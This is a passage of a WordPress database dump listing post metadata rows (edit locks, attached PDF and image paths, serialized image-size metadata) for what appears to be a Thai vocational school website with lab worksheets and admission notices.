\"0\";s:8:\"keywords\";a:0:{}}}'),
(16366, 7223, '_edit_lock', '1581990865:14'),
(16367, 7223, '_edit_last', '14'),
(16368, 7224, '_wp_attached_file', '2020/02/180263-05.pdf'),
(16371, 7223, '_hide_featured', NULL),
(16376, 7227, '_edit_lock', '1581991563:14'),
(16377, 7227, '_edit_last', '14'),
(16378, 7228, '_wp_attached_file', '2020/02/180263-04.pdf'),
(16381, 7227, '_hide_featured', NULL),
(16386, 7230, '_edit_lock', '1581991723:14'),
(16387, 7230, '_edit_last', '14'),
(16388, 7231, '_wp_attached_file', '2020/02/180263-03.pdf'),
(16391, 7230, '_hide_featured', NULL),
(16396, 7233, '_edit_lock', '1581991855:14'),
(16397, 7233, '_edit_last', '14'),
(16398, 7234, '_wp_attached_file', '2020/02/180263-02.pdf'),
(16401, 7233, '_hide_featured', NULL),
(16406, 7236, '_edit_lock', '1581991987:14'),
(16407, 7236, '_edit_last', '14'),
(16408, 7237, '_wp_attached_file', '2020/02/180263-01.pdf'),
(16411, 7236, '_hide_featured', NULL),
(16416, 7239, '_edit_lock', '1582016932:14'),
(16417, 7239, '_edit_last', '14'),
(16418, 7240, '_wp_attached_file', '2020/02/180263-06.pdf'),
(16421, 7239, '_hide_featured', NULL),
(16450, 7267, '_wp_attached_file', '2020/02/ใบเนื้อหาหน่วย1.pdf'),
(16453, 7270, '_wp_attached_file', '2020/02/ใบงาน1-ECU.pdf'),
(16454, 7271, '_wp_attached_file', '2020/02/ใบผลปฏิบัติงาน-1-ECU.pdf'),
(16455, 7272, '_wp_attached_file', '2020/02/ใบเนื้อหาหน่วย7.pdf'),
(16456, 7273, '_wp_attached_file', '2020/02/ใบงาน7-INJ.pdf'),
(16457, 7274, '_wp_attached_file', '2020/02/ใบผลปฏิบัติงาน-7.pdf'),
(16458, 7275, '_wp_attached_file', '2020/02/ใบงาน15-การฉีด-Oscill.pdf'),
(16459, 7276, '_wp_attached_file', '2020/02/แบบ.pdf'),
(16463, 7281, '_wp_attached_file', '2020/02/190263-07.png'),
(16464, 7281, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:21:\"2020/02/190263-07.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"190263-07-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"190263-07-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"190263-07-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(16472, 7284, '_wp_attached_file', '2020/02/190263-06.png'),
(16473, 7284, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:21:\"2020/02/190263-06.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"190263-06-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"190263-06-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"190263-06-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(16483, 7287, '_wp_attached_file', '2020/02/190263-04.png'),
(16484, 7287, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:21:\"2020/02/190263-04.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"190263-04-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"190263-04-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"190263-04-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(16492, 7290, '_wp_attached_file', '2020/02/190263-02.png'),
(16493, 7290, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:21:\"2020/02/190263-02.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"190263-02-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"190263-02-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"190263-02-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(16518, 7292, '_edit_lock', '1582100667:14'),
(16519, 7292, '_edit_last', '14'),
(16520, 7293, '_wp_attached_file', '2020/02/190263-01.png'),
(16521, 7293, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/02/190263-01.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"190263-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"190263-01-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"190263-01-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"190263-01-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"190263-01-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(16522, 7292, '_oembed_29a1edaafbaeca3ecbb09c0cdb501016', '{{unknown}}'),
(16523, 7292, '_thumbnail_id', '7293'),
(16526, 7292, '_hide_featured', NULL),
(16531, 7295, '_edit_lock', '1582100739:14'),
(16532, 7296, '_wp_attached_file', '2020/02/190263-03.png'),
(16533, 7296, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/02/190263-03.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"190263-03-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"190263-03-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"190263-03-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"190263-03-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"190263-03-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(16534, 7295, '_oembed_29a1edaafbaeca3ecbb09c0cdb501016', '{{unknown}}'),
(16535, 7295, '_edit_last', '14'),
(16536, 7295, '_thumbnail_id', '7296'),
(16539, 7295, '_hide_featured', NULL),
(16542, 7298, '_edit_lock', '1582100824:14'),
(16543, 7298, '_edit_last', '14'),
(16544, 7299, '_wp_attached_file', '2020/02/190263-05.png'),
(16545, 7299, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/02/190263-05.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"190263-05-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"190263-05-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"190263-05-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"190263-05-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"190263-05-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(16546, 7298, '_oembed_29a1edaafbaeca3ecbb09c0cdb501016', '{{unknown}}'),
(16547, 7298, '_thumbnail_id', '7299'),
(16550, 7298, '_hide_featured', NULL),
(16578, 7307, '_wp_attached_file', '2019/12/ประกาศรับสมัคร.png'),
(16579, 7307, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:900;s:4:\"file\";s:54:\"2019/12/ประกาศรับสมัคร.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:54:\"ประกาศรับสมัคร-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:54:\"ประกาศรับสมัคร-300x180.png\";s:5:\"width\";i:300;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:54:\"ประกาศรับสมัคร-768x461.png\";s:5:\"width\";i:768;s:6:\"height\";i:461;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:55:\"ประกาศรับสมัคร-1024x614.png\";s:5:\"width\";i:1024;s:6:\"height\";i:614;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:54:\"ประกาศรับสมัคร-400x240.png\";s:5:\"width\";i:400;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(16580, 7309, '_wp_attached_file', '2019/12/ประกาศรับสมัคร-1.png'),
(16581, 7309, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:600;s:4:\"file\";s:56:\"2019/12/ประกาศรับสมัคร-1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:56:\"ประกาศรับสมัคร-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:56:\"ประกาศรับสมัคร-1-300x120.png\";s:5:\"width\";i:300;s:6:\"height\";i:120;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:56:\"ประกาศรับสมัคร-1-768x307.png\";s:5:\"width\";i:768;s:6:\"height\";i:307;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:57:\"ประกาศรับสมัคร-1-1024x410.png\";s:5:\"width\";i:1024;s:6:\"height\";i:410;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:56:\"ประกาศรับสมัคร-1-400x160.png\";s:5:\"width\";i:400;s:6:\"height\";i:160;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(16582, 7298, '_oembed_5fc74297d91a50cfde63e2a5102e9a1d', '{{unknown}}'),
(16583, 7295, '_oembed_5fc74297d91a50cfde63e2a5102e9a1d', '{{unknown}}'),
(16584, 7292, '_oembed_5fc74297d91a50cfde63e2a5102e9a1d', '{{unknown}}'),
(16704, 7399, '_edit_lock', '1582169351:14'),
(16705, 7399, '_edit_last', '14'),
(16706, 7400, '_wp_attached_file', '2020/02/200263-04-e1582167976517.jpg'),
(16707, 7400, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1531;s:6:\"height\";i:1069;s:4:\"file\";s:36:\"2020/02/200263-04-e1582167976517.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"200263-04-e1582167976517-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"200263-04-e1582167976517-300x209.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:209;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"200263-04-e1582167976517-768x536.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"200263-04-e1582167976517-1024x715.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:715;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:36:\"200263-04-e1582167976517-400x279.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:279;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(16708, 7401, '_wp_attached_file', '2020/02/200263-03.jpg'),
(16709, 7401, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1049;s:6:\"height\";i:1560;s:4:\"file\";s:21:\"2020/02/200263-03.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"200263-03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"200263-03-202x300.jpg\";s:5:\"width\";i:202;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"200263-03-768x1142.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1142;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"200263-03-689x1024.jpg\";s:5:\"width\";i:689;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"200263-03-202x300.jpg\";s:5:\"width\";i:202;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(16710, 7402, '_wp_attached_file', '2020/02/200263-02.jpg'),
(16711, 7402, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:1475;s:4:\"file\";s:21:\"2020/02/200263-02.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"200263-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"200263-02-220x300.jpg\";s:5:\"width\";i:220;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"200263-02-768x1049.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1049;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"200263-02-750x1024.jpg\";s:5:\"width\";i:750;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"200263-02-220x300.jpg\";s:5:\"width\";i:220;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(16712, 7403, '_wp_attached_file', '2020/02/200263-01.jpg'),
(16713, 7403, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1045;s:6:\"height\";i:1566;s:4:\"file\";s:21:\"2020/02/200263-01.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"200263-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"200263-01-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"200263-01-768x1151.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1151;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"200263-01-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"200263-01-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(16714, 7400, '_wp_attachment_backup_sizes', 'a:6:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1069;s:6:\"height\";i:1531;s:4:\"file\";s:13:\"200263-04.jpg\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:21:\"200263-04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:21:\"200263-04-209x300.jpg\";s:5:\"width\";i:209;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"medium_large-orig\";a:4:{s:4:\"file\";s:22:\"200263-04-768x1100.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"large-orig\";a:4:{s:4:\"file\";s:22:\"200263-04-715x1024.jpg\";s:5:\"width\";i:715;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"university-hub-thumb-orig\";a:4:{s:4:\"file\";s:21:\"200263-04-209x300.jpg\";s:5:\"width\";i:209;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),
(16717, 7399, '_hide_featured', NULL),
(17004, 7638, '_wp_old_date', '2020-02-24'),
(17559, 8101, '_wp_attached_file', '2019/12/ประกาศยกเลิกพิธีมอบประกาศ.pdf'),
(17560, 8103, '_wp_attached_file', '2019/12/ยกเลิกมอบประกาศ.png'),
(17561, 8103, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:450;s:4:\"file\";s:57:\"2019/12/ยกเลิกมอบประกาศ.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:57:\"ยกเลิกมอบประกาศ-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:56:\"ยกเลิกมอบประกาศ-300x90.png\";s:5:\"width\";i:300;s:6:\"height\";i:90;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:57:\"ยกเลิกมอบประกาศ-768x230.png\";s:5:\"width\";i:768;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:58:\"ยกเลิกมอบประกาศ-1024x307.png\";s:5:\"width\";i:1024;s:6:\"height\";i:307;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:57:\"ยกเลิกมอบประกาศ-400x120.png\";s:5:\"width\";i:400;s:6:\"height\";i:120;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(17564, 8109, '_wp_attached_file', '2019/12/Untitled-1.png'),
(17565, 8109, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:450;s:4:\"file\";s:22:\"2019/12/Untitled-1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"Untitled-1-300x90.png\";s:5:\"width\";i:300;s:6:\"height\";i:90;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Untitled-1-768x230.png\";s:5:\"width\";i:768;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Untitled-1-1024x307.png\";s:5:\"width\";i:1024;s:6:\"height\";i:307;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"Untitled-1-400x120.png\";s:5:\"width\";i:400;s:6:\"height\";i:120;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(17566, 8110, '_wp_attached_file', '2019/12/Untitled-1-1.png'),
